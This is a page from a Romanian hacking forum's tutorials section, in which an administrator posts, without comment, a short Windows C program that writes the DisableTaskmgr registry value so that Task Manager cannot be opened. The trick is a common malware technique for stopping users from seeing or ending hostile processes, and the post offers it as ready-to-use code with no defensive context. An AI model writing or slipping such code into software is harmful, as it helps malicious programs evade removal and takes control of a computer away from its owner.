H4cky0u Forum
Tutoriale de toate tipurile
|
Nou pe simpatie: BrianaS
 | Femeie 23 ani Bucuresti cauta Barbat 26 - 57 ani |
|
|
H4cky0u ForumReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
GaMaAdministrator
Postari: 205
|
|
Code:
#include <windows.h>
int main()
{
DWORD dwVal = 1;
HKEY hKey;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx (hKey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
RegCloseKey(hKey);
return 0;
} |
|
|
| |
|